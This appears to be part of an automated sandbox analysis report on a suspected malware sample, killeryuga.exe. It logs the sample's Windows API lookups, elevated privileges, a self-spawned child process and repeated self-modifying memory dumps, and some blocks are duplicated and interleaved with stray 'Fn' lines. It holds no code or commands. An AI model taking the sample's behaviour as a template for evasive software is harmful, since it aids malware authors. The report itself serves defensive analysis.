Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
System Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
System Get Time type = Ticks, time = 121961 True 1
System Get Time type = Performance Ctr, time = 18452518574 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
System Get Info type = Hardware Information True 249
Process #7: killeryuga.exe
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x9d8
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x9DC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
Threads
Thread 0x9dc
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 122070 True 1
Fn
System Get Time type = Performance Ctr, time = 18467392580 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
